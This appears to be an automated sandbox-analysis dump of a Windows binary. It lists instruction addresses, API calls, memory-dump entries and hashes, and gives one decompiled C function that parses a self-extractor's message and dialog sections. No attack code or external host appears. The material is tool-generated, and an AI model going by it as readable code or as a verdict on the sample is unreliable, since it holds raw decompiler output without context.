                            0x009fbf65
                            0x009fbf71
                            0x009fbf78
                            0x009fbf7d
                            0x009fbf85
                            0x009fbf8b
                            0x009fbf8c
                            0x009fbf8d
                            0x009fbf8f
                            0x009fbf8f
                            0x009fbfa4
                            0x009fbfa9
                            0x009fbfb5
                            0x009fbfb7
                            0x009fbfd5
                            0x009fbfda
                            0x009fbfb9
                            0x009fbfc4
                            0x009fbfc6
                            0x009fbfc7
                            0x009fbfc7
                            0x009fbfb7
                            0x00000000
                            0x009fc087
                            0x009fc08a
                            0x009fc08c
                            0x009fc08c
                            0x00000000
                            0x00000000
                            0x009fbab8
                            0x009fbac0
                            0x009fbac6
                            0x009fbac9
                            0x009fbaed
                            0x009fbacb
                            0x009fbacb
                            0x009fbace
                            0x009fbae1
                            0x009fbad0
                            0x009fbad0
                            0x009fbad2
                            0x009fbad7
                            0x009fbad7
                            0x009fbace
                            0x00000000
                            0x00000000
                            0x009fbb31
                            0x009fbb32
                            0x009fbb37
                            0x009fbb37
                            0x009fbb37
                            0x009fbb3a
                            0x009fbb3f
                            0x009fbb45
                            0x009fbb45
                            0x009fbb4b
                            0x009fbb51
                            0x009fbb51
                            0x00000000
                            0x00000000
                            0x009fb52a
                            0x009fb52c
                            0x009fb531
                            0x009fb537
                            0x009fb53a
                            0x00000000
                            0x009fb53c
                            0x009fb53c
                            0x00000000
                            0x009fb53c
                            0x009fc093
                            0x009fc093
                            0x009fc098
                            0x009fc09c
                            0x009fc0a0
                            0x009fc0a7
                            0x009fc0ae
                            0x009fc0b1
                            0x009fc0b6
                            0x009fc0b9
                            0x009fc0bc
                            0x009fc0c6

                            APIs
                            • __EH_prolog.LIBCMT ref: 009FB4CC
                              • Part of subcall function 009FA156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 009FA21E
                            • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,009FADDF,?,00000000), ref: 009FB601
                            • GetFileAttributesW.KERNEL32(?), ref: 009FB6BB
                            • DeleteFileW.KERNEL32(?), ref: 009FB6C9
                            • SetWindowTextW.USER32(?,?), ref: 009FB812
                            • _wcsrchr.LIBVCRUNTIME ref: 009FB99C
                            • GetDlgItem.USER32(?,00000066), ref: 009FB9D7
                            • SetWindowTextW.USER32(00000000,?), ref: 009FB9E7
                            • SendMessageW.USER32(00000000,00000143,00000000,00A29602), ref: 009FB9FB
                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009FBA24
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                            • API String ID: 3676479488-312220925
                            • Opcode ID: 062def94b4a63e54e358e81338e6a9381a412cfba4ab8dab0ddb6f2ec0289613
                            • Instruction ID: e20440a70c9a7080e924e697b1469520b6e2fae95f19a8b3ee42f63dc8515b7d
                            • Opcode Fuzzy Hash: 062def94b4a63e54e358e81338e6a9381a412cfba4ab8dab0ddb6f2ec0289613
                            • Instruction Fuzzy Hash: 27E1627290021DAADF25EFA0DD85EEE737CAB44350F1440A6F609E7151EF749F858B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009ECFD0, Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 557COMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E009ECFD0(signed int __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t196;
				void* _t197;
				WCHAR* _t198;
				void* _t203;
				signed int _t212;
				signed int _t215;
				signed int _t218;
				signed int _t228;
				void* _t229;
				void* _t232;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t244;
				signed int _t248;
				signed int _t262;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t272;
				signed int _t273;
				void* _t274;
				signed int _t279;
				char* _t280;
				signed int _t284;
				short _t287;
				void* _t288;
				signed int _t294;
				signed int _t299;
				void* _t302;
				void* _t304;
				void* _t307;
				signed int _t316;
				signed int _t318;
				unsigned int _t328;
				signed int _t330;
				unsigned int _t333;
				signed int _t336;
				void* _t343;
				signed int _t348;
				signed int _t351;
				signed int _t352;
				signed int _t357;
				signed int _t361;
				void* _t370;
				signed int _t372;
				signed int _t373;
				void* _t374;
				void* _t375;
				intOrPtr* _t376;
				signed int _t377;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t387;
				signed int _t389;
				signed int* _t390;
				void* _t391;
				void* _t392;
				void* _t394;
				void* _t398;
				void* _t399;

				_t370 = __edx;
				_t318 = __ecx;
				_t392 = _t391 - 0x6c;
				E009FD870(E00A113DF, _t390);
				E009FD940();
				_t196 = 0x5c;
				_push(0x427c);
				_push(_t390[0x1e]);
				_t387 = _t318;
				_t390[0x11] = _t196;
				_t390[0x12] = _t387;
				_t197 = E00A00BB8(_t318);
				_t316 = 0;
				_t396 = _t197;
				_t198 = _t390 - 0x1264;
				if(_t197 != 0) {
					E009EFAB1(_t198, _t390[0x1e], 0x800);
				} else {
					GetModuleFileNameW(0, _t198, 0x800);
					 *((short*)(E009EB943(_t396, _t390 - 0x1264))) = 0;
					E009EFA89(_t396, _t390 - 0x1264, _t390[0x1e], 0x800);
				}
				E009E943C(_t390 - 0x2288);
				_push(4);
				 *(_t390 - 4) = _t316;
				_push(_t390 - 0x1264);
				if(E009E9768(_t390 - 0x2288, _t387) == 0) {
					L57:
					_t203 = E009E946E(_t390 - 0x2288); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t390 - 0xc));
					return _t203;
				} else {
					_t380 = _t316;
					_t398 =  *0xa1d5f4 - _t380; // 0x63
					if(_t398 <= 0) {
						L7:
						E00A05030(_t316, _t380, _t387,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E009ECC62);
						E00A05030(_t316, _t380, _t387,  *((intOrPtr*)(_t387 + 0x14)),  *((intOrPtr*)(_t387 + 0x18)), 4, E009ECBC7);
						_t394 = _t392 + 0x20;
						_t390[0x1e] = _t316;
						_t381 = _t380 | 0xffffffff;
						_t390[0x16] = _t316;
						_t390[0x19] = _t381;
						while(_t381 == 0xffffffff) {
							_t390[0x1b] = E009E9B57();
							_t294 = E009E9979(_t370, _t390 - 0x4288, 0x2000);
							_t390[0x17] = _t294;
							_t384 = _t316;
							_t25 = _t294 - 0x10; // -16
							_t361 = _t25;
							_t390[0x15] = _t361;
							if(_t361 < 0) {
								L25:
								_t295 = _t390[0x1b];
								_t381 = _t390[0x19];
								L26:
								E009E9A4C(_t390 - 0x2288, _t390, _t295 + _t390[0x17] + 0xfffffff0, _t316, _t316);
								_t299 = _t390[0x16] + 1;
								_t390[0x16] = _t299;
								__eflags = _t299 - 0x100;
								if(_t299 < 0x100) {
									continue;
								}
								__eflags = _t381 - 0xffffffff;
								if(_t381 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t390 + _t384 - 0x4288)) != 0x2a ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x2a) {
									L14:
									_t370 = 0x2a;
									if( *((intOrPtr*)(_t390 + _t384 - 0x4288)) != _t370) {
										L18:
										if( *((char*)(_t390 + _t384 - 0x4288)) != 0x52 ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x61) {
											L21:
											_t384 = _t384 + 1;
											if(_t384 > _t390[0x15]) {
												goto L25;
											}
											_t294 = _t390[0x17];
											continue;
										} else {
											_t302 = E00A05460(_t390 - 0x4286 + _t384, 0xa1261c, 4);
											_t394 = _t394 + 0xc;
											if(_t302 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t366 = _t390 - 0x4284 + _t384;
									if( *((intOrPtr*)(_t390 - 0x4284 + _t384 - 2)) == _t370 && _t384 <= _t294 + 0xffffffe0) {
										_t304 = E00A04DA0(_t366, L"*messages***", 0xb);
										_t394 = _t394 + 0xc;
										if(_t304 == 0) {
											_t390[0x1e] = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t307 = E00A05460(_t390 - 0x4286 + _t384, "*messages***", 0xb);
									_t394 = _t394 + 0xc;
									if(_t307 == 0) {
										L24:
										_t295 = _t390[0x1b];
										_t381 = _t384 + _t390[0x1b];
										_t390[0x19] = _t381;
										goto L26;
									}
									_t294 = _t390[0x17];
									goto L14;
								}
							}
						}
						asm("cdq");
						E009E9A4C(_t390 - 0x2288, _t390, _t381, _t370, _t316);
						_push(0x200002);
						_t382 = E00A02B53(_t390 - 0x2288);
						_t390[0x1a] = _t382;
						__eflags = _t382;
						if(_t382 == 0) {
							goto L57;
						}
						_t328 = E009E9979(_t370, _t382, 0x200000);
						_t390[0x19] = _t328;
						__eflags = _t390[0x1e];
						if(_t390[0x1e] == 0) {
							_push(2 + _t328 * 2);
							_t212 = E00A02B53(_t328);
							_t390[0x1e] = _t212;
							__eflags = _t212;
							if(_t212 == 0) {
								goto L57;
							}
							_t330 = _t390[0x19];
							 *(_t330 + _t382) = _t316;
							__eflags = _t330 + 1;
							E009F0FDE(_t382, _t212, _t330 + 1);
							L00A02B4E(_t382);
							_t382 = _t390[0x1e];
							_t333 = _t390[0x19];
							_t390[0x1a] = _t382;
							L33:
							_t215 = 0x100000;
							__eflags = _t333 - 0x100000;
							if(_t333 <= 0x100000) {
								_t215 = _t333;
							}
							 *((short*)(_t382 + _t215 * 2)) = 0;
							E009EFA56(_t390 - 0xd4, 0xa12624, 0x64);
							_push(0x20002);
							_t218 = E00A02B53(0);
							_t390[0x1b] = _t218;
							__eflags = _t218;
							if(_t218 != 0) {
								__eflags = _t390[0x19];
								_t336 = _t316;
								_t371 = _t316;
								_t390[0x1e] = _t336;
								 *_t390 = _t316;
								_t383 = _t316;
								_t390[0x17] = _t316;
								if(_t390[0x19] <= 0) {
									L54:
									E009ECB33(_t387, _t371, _t390, _t218, _t336);
									L00A02B4E(_t390[0x1a]);
									L00A02B4E(_t390[0x1b]);
									__eflags =  *((intOrPtr*)(_t387 + 0x2c)) - _t316;
									if( *((intOrPtr*)(_t387 + 0x2c)) <= _t316) {
										L56:
										 *0xa20124 =  *((intOrPtr*)(_t387 + 0x28));
										E00A05030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x3c)),  *((intOrPtr*)(_t387 + 0x40)), 4, E009ECD08);
										E00A05030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x50)),  *((intOrPtr*)(_t387 + 0x54)), 4, E009ECD37);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E009F3393(_t387 + 0x3c, _t371, _t316);
										E009F3393(_t387 + 0x50, _t371, _t316);
										_t316 = _t316 + 1;
										__eflags = _t316 -  *((intOrPtr*)(_t387 + 0x2c));
									} while (_t316 <  *((intOrPtr*)(_t387 + 0x2c)));
									goto L56;
								}
								_t390[0x14] = 0xd;
								_t390[0x13] = 0xa;
								_t390[0x15] = 9;
								do {
									_t228 = _t390[0x1a];
									__eflags = _t383;
									if(_t383 == 0) {
										L80:
										_t372 =  *(_t228 + _t383 * 2) & 0x0000ffff;
										_t383 = _t383 + 1;
										__eflags = _t372;
										if(_t372 == 0) {
											break;
										}
										__eflags = _t372 - _t390[0x11];
										if(_t372 != _t390[0x11]) {
											_t229 = 0xd;
											__eflags = _t372 - _t229;
											if(_t372 == _t229) {
												L99:
												E009ECB33(_t387, _t390[0x17], _t390, _t390[0x1b], _t336);
												 *_t390 = _t316;
												_t336 = _t316;
												_t390[0x17] = _t316;
												L98:
												_t390[0x1e] = _t336;
												goto L52;
											}
											_t232 = 0xa;
											__eflags = _t372 - _t232;
											if(_t372 == _t232) {
												goto L99;
											}
											L96:
											__eflags = _t336 - 0x10000;
											if(_t336 >= 0x10000) {
												goto L52;
											}
											 *(_t390[0x1b] + _t336 * 2) = _t372;
											_t336 = _t336 + 1;
											__eflags = _t336;
											goto L98;
										}
										__eflags = _t336 - 0x10000;
										if(_t336 >= 0x10000) {
											goto L52;
										}
										_t235 = ( *(_t228 + _t383 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t235;
										if(_t235 == 0) {
											_push(0x22);
											L93:
											_pop(_t377);
											 *(_t390[0x1b] + _t336 * 2) = _t377;
											_t336 = _t336 + 1;
											_t390[0x1e] = _t336;
											_t383 = _t383 + 1;
											goto L52;
										}
										_t237 = _t235 - 0x3a;
										__eflags = _t237;
										if(_t237 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t238 = _t237 - 0x12;
										__eflags = _t238;
										if(_t238 == 0) {
											_push(0xa);
											goto L93;
										}
										_t239 = _t238 - 4;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t239 != 0;
										if(_t239 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t373 =  *(_t228 + _t383 * 2 - 2) & 0x0000ffff;
									__eflags = _t373 - _t390[0x14];
									if(_t373 == _t390[0x14]) {
										L42:
										_t343 = 0x3a;
										__eflags =  *(_t228 + _t383 * 2) - _t343;
										if( *(_t228 + _t383 * 2) != _t343) {
											L71:
											_t390[0x18] = _t228 + _t383 * 2;
											_t244 = E009EF91A( *(_t228 + _t383 * 2) & 0x0000ffff);
											__eflags = _t244;
											if(_t244 == 0) {
												L79:
												_t336 = _t390[0x1e];
												_t228 = _t390[0x1a];
												goto L80;
											}
											E009EFAB1(_t390 - 0x264, _t390[0x18], 0x64);
											_t248 = E00A04E1D(_t390 - 0x264, L" \t,");
											_t390[0x18] = _t248;
											__eflags = _t248;
											if(_t248 == 0) {
												goto L79;
											}
											 *_t248 = 0;
											E009F11FA(_t390 - 0x264, _t390 - 0x138, 0x64);
											E009EFA56(_t390 - 0x70, _t390 - 0xd4, 0x64);
											E009EFA2F(__eflags, _t390 - 0x70, _t390 - 0x138, 0x64);
											E009EFA56(_t390, _t390 - 0x70, 0x32);
											_t262 = E00A04E71(_t316, 0, _t383, _t387, _t390 - 0x70,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E009ECCED);
											_t394 = _t394 + 0x14;
											__eflags = _t262;
											if(_t262 != 0) {
												_t268 =  *_t262 * 0xc;
												__eflags = _t268;
												_t167 = _t268 + 0xa1d150; // 0x28b64ee0
												_t390[0x17] =  *_t167;
											}
											_t383 = _t383 + (_t390[0x18] - _t390 - 0x264 >> 1) + 1;
											__eflags = _t383;
											_t267 = _t390[0x1a];
											_t374 = 0x20;
											while(1) {
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												L77:
												_t174 =  &(_t390[0x15]); // 0x9
												__eflags = _t348 -  *_t174;
												if(_t348 !=  *_t174) {
													L51:
													_t336 = _t390[0x1e];
													goto L52;
												}
												L78:
												_t383 = _t383 + 1;
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												goto L77;
											}
										}
										_t389 = _t390[0x1a];
										_t270 = _t228 | 0xffffffff;
										__eflags = _t270;
										_t390[0x16] = _t270;
										_t390[0xd] = L"STRINGS";
										_t390[0xe] = L"DIALOG";
										_t390[0xf] = L"MENU";
										_t390[0x10] = L"DIRECTION";
										_t390[0x18] = _t316;
										do {
											_t390[0x18] = E00A02B33( *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)));
											_t272 = E00A04DA0(_t389 + 2 + _t383 * 2,  *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)), _t271);
											_t394 = _t394 + 0x10;
											_t375 = 0x20;
											__eflags = _t272;
											if(_t272 != 0) {
												L47:
												_t273 = _t390[0x16];
												goto L48;
											}
											_t357 = _t390[0x18] + _t383;
											__eflags =  *((intOrPtr*)(_t389 + 2 + _t357 * 2)) - _t375;
											if( *((intOrPtr*)(_t389 + 2 + _t357 * 2)) > _t375) {
												goto L47;
											}
											_t273 = _t316;
											_t383 = _t357 + 1;
											_t390[0x16] = _t273;
											L48:
											_t316 = _t316 + 1;
											__eflags = _t316 - 4;
										} while (_t316 < 4);
										_t387 = _t390[0x12];
										_t316 = 0;
										__eflags = _t273;
										if(__eflags != 0) {
											_t228 = _t390[0x1a];
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												L60:
												_t132 =  &(_t390[0x15]); // 0x9
												__eflags = _t351 -  *_t132;
												if(_t351 !=  *_t132) {
													_t376 = _t228 + _t383 * 2;
													_t390[0x18] = _t316;
													_t274 = 0x20;
													_t352 = _t316;
													__eflags =  *_t376 - _t274;
													if( *_t376 <= _t274) {
														L66:
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = 0;
														E009F11FA(_t390 - 0x19c, _t390 - 0x70, 0x64);
														_t383 = _t383 + _t390[0x18];
														_t279 = _t390[0x16];
														__eflags = _t279 - 3;
														if(_t279 != 3) {
															__eflags = _t279 - 1;
															_t280 = "$%s:";
															if(_t279 != 1) {
																_t280 = "@%s:";
															}
															E009ED9DC(_t390 - 0xd4, 0x64, _t280, _t390 - 0x70);
															_t394 = _t394 + 0x10;
														} else {
															_t284 = E00A02B69(_t390 - 0x19c, _t390 - 0x19c, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t387 + 0x64)) =  ~_t284 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t352 - 0x63;
														if(_t352 >= 0x63) {
															break;
														}
														_t287 =  *_t376;
														_t376 = _t376 + 2;
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = _t287;
														_t352 = _t352 + 1;
														_t288 = 0x20;
														__eflags =  *_t376 - _t288;
														if( *_t376 > _t288) {
															continue;
														}
														break;
													}
													_t390[0x18] = _t352;
													goto L66;
												}
												L61:
												_t383 = _t383 + 1;
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												goto L60;
											}
										}
										E009EFA56(_t390 - 0xd4, 0xa12624, 0x64);
										goto L51;
									}
									__eflags = _t373 - _t390[0x13];
									if(_t373 != _t390[0x13]) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t383 - _t390[0x19];
								} while (_t383 < _t390[0x19]);
								_t218 = _t390[0x1b];
								_t371 = _t390[0x17];
								goto L54;
							} else {
								L00A02B4E(_t382);
								goto L57;
							}
						}
						_t333 = _t328 >> 1;
						_t390[0x19] = _t333;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E009F3393(_t387, _t370, _t380);
						E009F3393(_t387 + 0x14, _t370, _t380);
						_t380 = _t380 + 1;
						_t399 = _t380 -  *0xa1d5f4; // 0x63
					} while (_t399 < 0);
					_t316 = 0;
					goto L7;
				}
			}








































































                            0x009ecfd0
                            0x009ecfd0
                            0x009ecfd1
                            0x009ecfd9
                            0x009ecfe3
                            0x009ecfed
                            0x009ecfee
                            0x009ecfef
                            0x009ecff2
                            0x009ecff4
                            0x009ecff7
                            0x009ecffa
                            0x009ed000
                            0x009ed002
                            0x009ed005
                            0x009ed00b
                            0x009ed047
                            0x009ed00d
                            0x009ed015
                            0x009ed02d
                            0x009ed037
                            0x009ed037
                            0x009ed052
                            0x009ed057
                            0x009ed05f
                            0x009ed062
                            0x009ed070
                            0x009ed42d
                            0x009ed433
                            0x009ed43e
                            0x009ed449
                            0x009ed076
                            0x009ed076
                            0x009ed078
                            0x009ed07e
                            0x009ed09c
                            0x009ed0a8
                            0x009ed0ba
                            0x009ed0bf
                            0x009ed0c2
                            0x009ed0c5
                            0x009ed0c8
                            0x009ed0cb
                            0x009ed0ce
                            0x009ed0e2
                            0x009ed0f7
                            0x009ed0fc
                            0x009ed0ff
                            0x009ed101
                            0x009ed101
                            0x009ed104
                            0x009ed109
                            0x009ed1c8
                            0x009ed1c8
                            0x009ed1cb
                            0x009ed1ce
                            0x009ed1df
                            0x009ed1e7
                            0x009ed1e8
                            0x009ed1eb
                            0x009ed1f0
                            0x00000000
                            0x00000000
                            0x009ed1f6
                            0x009ed1f9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ed1f9
                            0x00000000
                            0x009ed10f
                            0x009ed117
                            0x009ed142
                            0x009ed144
                            0x009ed14d
                            0x009ed178
                            0x009ed180
                            0x009ed1ac
                            0x009ed1ac
                            0x009ed1b0
                            0x00000000
                            0x00000000
                            0x009ed1b2
                            0x00000000
                            0x009ed18c
                            0x009ed19c
                            0x009ed1a1
                            0x009ed1a6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ed1a6
                            0x009ed180
                            0x009ed155
                            0x009ed15b
                            0x009ed16c
                            0x009ed171
                            0x009ed176
                            0x009ed1ba
                            0x00000000
                            0x009ed1ba
                            0x009ed176
                            0x00000000
                            0x009ed123
                            0x009ed133
                            0x009ed138
                            0x009ed13d
                            0x009ed1be
                            0x009ed1be
                            0x009ed1c1
                            0x009ed1c3
                            0x00000000
                            0x009ed1c3
                            0x009ed13f
                            0x00000000
                            0x009ed13f
                            0x009ed117
                            0x009ed10f
                            0x009ed208
                            0x009ed20b
                            0x009ed210
                            0x009ed21a
                            0x009ed21c
                            0x009ed220
                            0x009ed222
                            0x00000000
                            0x00000000
                            0x009ed239
                            0x009ed23e
                            0x009ed241
                            0x009ed243
                            0x009ed253
                            0x009ed254
                            0x009ed259
                            0x009ed25d
                            0x009ed25f
                            0x00000000
                            0x00000000
                            0x009ed265
                            0x009ed268
                            0x009ed26b
                            0x009ed26f
                            0x009ed275
                            0x009ed27a
                            0x009ed27e
                            0x009ed281
                            0x009ed284
                            0x009ed284
                            0x009ed289
                            0x009ed28b
                            0x009ed28d
                            0x009ed28d
                            0x009ed293
                            0x009ed2a3
                            0x009ed2a8
                            0x009ed2ad
                            0x009ed2b2
                            0x009ed2b6
                            0x009ed2b8
                            0x009ed2c6
                            0x009ed2ca
                            0x009ed2cc
                            0x009ed2ce
                            0x009ed2d1
                            0x009ed2d4
                            0x009ed2d6
                            0x009ed2d9
                            0x009ed3c1
                            0x009ed3ca
                            0x009ed3d2
                            0x009ed3da
                            0x009ed3e1
                            0x009ed3e4
                            0x009ed3fe
                            0x009ed40b
                            0x009ed413
                            0x009ed425
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ed3e6
                            0x009ed3e6
                            0x009ed3ea
                            0x009ed3f3
                            0x009ed3f8
                            0x009ed3f9
                            0x009ed3f9
                            0x00000000
                            0x009ed3e6
                            0x009ed2df
                            0x009ed2e6
                            0x009ed2ed
                            0x009ed2f4
                            0x009ed2f4
                            0x009ed2f7
                            0x009ed2f9
                            0x009ed5f5
                            0x009ed5f5
                            0x009ed5f9
                            0x009ed5fa
                            0x009ed5fd
                            0x00000000
                            0x00000000
                            0x009ed603
                            0x009ed607
                            0x009ed659
                            0x009ed65a
                            0x009ed65d
                            0x009ed683
                            0x009ed690
                            0x009ed695
                            0x009ed698
                            0x009ed69a
                            0x009ed67b
                            0x009ed67b
                            0x00000000
                            0x009ed67b
                            0x009ed661
                            0x009ed662
                            0x009ed665
                            0x00000000
                            0x00000000
                            0x009ed667
                            0x009ed667
                            0x009ed66d
                            0x00000000
                            0x00000000
                            0x009ed676
                            0x009ed67a
                            0x009ed67a
                            0x00000000
                            0x009ed67a
                            0x009ed609
                            0x009ed60f
                            0x00000000
                            0x00000000
                            0x009ed619
                            0x009ed619
                            0x009ed61c
                            0x009ed643
                            0x009ed645
                            0x009ed648
                            0x009ed649
                            0x009ed64d
                            0x009ed64e
                            0x009ed651
                            0x00000000
                            0x009ed651
                            0x009ed61e
                            0x009ed61e
                            0x009ed621
                            0x009ed63f
                            0x00000000
                            0x009ed63f
                            0x009ed623
                            0x009ed623
                            0x009ed626
                            0x009ed63b
                            0x00000000
                            0x009ed63b
                            0x009ed628
                            0x009ed628
                            0x009ed62b
                            0x009ed637
                            0x00000000
                            0x009ed637
                            0x009ed62e
                            0x009ed631
                            0x00000000
                            0x00000000
                            0x009ed633
                            0x00000000
                            0x009ed633
                            0x009ed2ff
                            0x009ed304
                            0x009ed308
                            0x009ed314
                            0x009ed316
                            0x009ed317
                            0x009ed31b
                            0x009ed508
                            0x009ed50b
                            0x009ed512
                            0x009ed517
                            0x009ed519
                            0x009ed5ef
                            0x009ed5ef
                            0x009ed5f2
                            0x00000000
                            0x009ed5f2
                            0x009ed52b
                            0x009ed53c
                            0x009ed541
                            0x009ed546
                            0x009ed548
                            0x00000000
                            0x00000000
                            0x009ed550
                            0x009ed563
                            0x009ed575
                            0x009ed587
                            0x009ed596
                            0x009ed5ab
                            0x009ed5b0
                            0x009ed5b3
                            0x009ed5b5
                            0x009ed5b7
                            0x009ed5b7
                            0x009ed5ba
                            0x009ed5c0
                            0x009ed5c0
                            0x009ed5d3
                            0x009ed5d3
                            0x009ed5d5
                            0x009ed5d8
                            0x009ed5d9
                            0x009ed5d9
                            0x009ed5dd
                            0x009ed5e0
                            0x00000000
                            0x00000000
                            0x009ed5e2
                            0x009ed5e2
                            0x009ed5e2
                            0x009ed5e6
                            0x009ed3af
                            0x009ed3af
                            0x00000000
                            0x009ed3af
                            0x009ed5ec
                            0x009ed5ec
                            0x009ed5d9
                            0x009ed5dd
                            0x009ed5e0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ed5e0
                            0x009ed5d9
                            0x009ed321
                            0x009ed324
                            0x009ed324
                            0x009ed327
                            0x009ed32a
                            0x009ed331
                            0x009ed338
                            0x009ed33f
                            0x009ed346
                            0x009ed349
                            0x009ed35a
                            0x009ed361
                            0x009ed366
                            0x009ed36b
                            0x009ed36c
                            0x009ed36e
                            0x009ed386
                            0x009ed386
                            0x00000000
                            0x009ed386
                            0x009ed373
                            0x009ed375
                            0x009ed37a
                            0x00000000
                            0x00000000
                            0x009ed37c
                            0x009ed37e
                            0x009ed381
                            0x009ed389
                            0x009ed389
                            0x009ed38a
                            0x009ed38a
                            0x009ed38f
                            0x009ed392
                            0x009ed394
                            0x009ed396
                            0x009ed44c
                            0x009ed44f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ed455
                            0x009ed455
                            0x009ed455
                            0x009ed459
                            0x009ed45c
                            0x00000000
                            0x00000000
                            0x009ed45e
                            0x009ed45e
                            0x009ed45e
                            0x009ed462
                            0x009ed467
                            0x009ed46a
                            0x009ed46f
                            0x009ed470
                            0x009ed472
                            0x009ed475
                            0x009ed496
                            0x009ed498
                            0x009ed4ad
                            0x009ed4b2
                            0x009ed4b5
                            0x009ed4b8
                            0x009ed4bb
                            0x009ed4de
                            0x009ed4e1
                            0x009ed4e6
                            0x009ed4e8
                            0x009ed4e8
                            0x009ed4fb
                            0x009ed500
                            0x009ed4bd
                            0x009ed4c9
                            0x009ed4d1
                            0x009ed4d6
                            0x009ed4d6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ed477
                            0x009ed477
                            0x009ed477
                            0x009ed47a
                            0x00000000
                            0x00000000
                            0x009ed47c
                            0x009ed47f
                            0x009ed482
                            0x009ed48a
                            0x009ed48d
                            0x009ed48e
                            0x009ed491
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ed491
                            0x009ed493
                            0x00000000
                            0x009ed493
                            0x009ed464
                            0x009ed464
                            0x009ed455
                            0x009ed455
                            0x009ed459
                            0x009ed45c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ed45c
                            0x009ed455
                            0x009ed3aa
                            0x00000000
                            0x009ed3aa
                            0x009ed30a
                            0x009ed30e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ed3b2
                            0x009ed3b2
                            0x009ed3b2
                            0x009ed3bb
                            0x009ed3be
                            0x00000000
                            0x009ed2ba
                            0x009ed2bb
                            0x00000000
                            0x009ed2c0
                            0x009ed2b8
                            0x009ed245
                            0x009ed247
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ed080
                            0x009ed080
                            0x009ed083
                            0x009ed08c
                            0x009ed091
                            0x009ed092
                            0x009ed092
                            0x009ed09a
                            0x00000000
                            0x009ed09a

                            APIs
                            • __EH_prolog.LIBCMT ref: 009ECFD9
                            • _wcschr.LIBVCRUNTIME ref: 009ECFFA
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 009ED015
                            • __fprintf_l.LIBCMT ref: 009ED4FB
                              • Part of subcall function 009F0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,009EB312,00000000,?,?,?,000201B4), ref: 009F0FFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
